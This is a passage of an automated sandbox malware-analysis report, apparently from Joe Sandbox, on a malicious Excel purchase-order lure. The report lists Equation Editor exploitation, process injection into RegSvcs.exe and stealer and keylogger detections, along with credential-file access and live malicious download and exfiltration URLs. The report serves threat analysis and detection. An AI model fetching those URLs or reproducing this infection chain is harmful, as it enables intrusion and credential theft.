Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013509D5 SetUnhandledExceptionFilter,	11_2_013509D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_01362622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0135083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_0135083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_01350C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008			Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\directory\name.exe

8_2_01051201

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_00B52BA5

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0105B226 SendInput,keybd_event,

8_2_0105B226

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

5_2_00B922DA

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe

5_2_00B70B62

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01051663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

8_2_01051663

Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp, negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp, negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: name.exe	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_3_029EFA98 cpuid

5_3_029EFA98

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

9_2_00417A20

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B4333F GetSystemTimeAsFileTime,

5_2_00B4333F

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0104D27A GetUserNameW,

8_2_0104D27A

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_0102B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

8_2_0102B952

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior

OS version to string mapping found (often used in BOTs)

Source: name.exe	Binary or memory string: WIN_81
Source: name.exe	Binary or memory string: WIN_XP
Source: name.exe.5.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: name.exe	Binary or memory string: WIN_XPe
Source: name.exe	Binary or memory string: WIN_VISTA
Source: name.exe	Binary or memory string: WIN_7
Source: name.exe	Binary or memory string: WIN_8

Yara detected Credential Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01071204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	8_2_01071204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01071806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	8_2_01071806
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	11_2_013B1204
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	11_2_013B1806

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
38.242.255.115	baitalasma.com	United States	36336	NATIXISUS	true
104.21.67.152	unknown	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

Contacted Domains

Name	IP	Active
baitalasma.com	38.242.255.115	true
reallyfreegeoip.org	172.67.177.134	true
checkip.dyndns.com	158.101.44.242	true
checkip.dyndns.org	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://baitalasma.com/T76434567000.exe	true	Avira URL Cloud: safe	unknown
https://baitalasma.com/T76434567000.exe	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/81.181.54.104	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Orden de compra 0001-00255454.xlam.xlsx

Avira: detected

Antivirus detection for URL or domain

Source: https://scratchdreams.tk	Avira URL Cloud: Label: malware
Source: https://scratchdreams.tk/_send_.php?TS	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp

Multi AV Scanner detection for domain / URL

Source: https://scratchdreams.tk	Virustotal: Detection: 18%			Perma Link
Source: https://scratchdreams.tk/_send_.php?TS	Virustotal: Detection: 16%			Perma Link

Multi AV Scanner detection for submitted file

Source: Orden de compra 0001-00255454.xlam.xlsx	Virustotal: Detection: 55%			Perma Link
Source: Orden de compra 0001-00255454.xlam.xlsx	ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\negrett.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\directory\name.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\T76434567000[1].exe	Joe Sandbox ML: detected

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 38.242.255.115 Port: 80			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 38.242.255.115 Port: 443			Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\negrett.exe			Jump to behavior

Office Equation Editor has been started

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000009.00000002.887613272.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: name.exe, 00000008.00000003.776938516.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000008.00000003.777173422.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.811942051.00000000011D0000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000003.813355111.0000000002B70000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4C2A2 FindFirstFileExW,	5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B868EE FindFirstFileW,FindClose,	5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102C2A2 FindFirstFileExW,	8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_0106698F
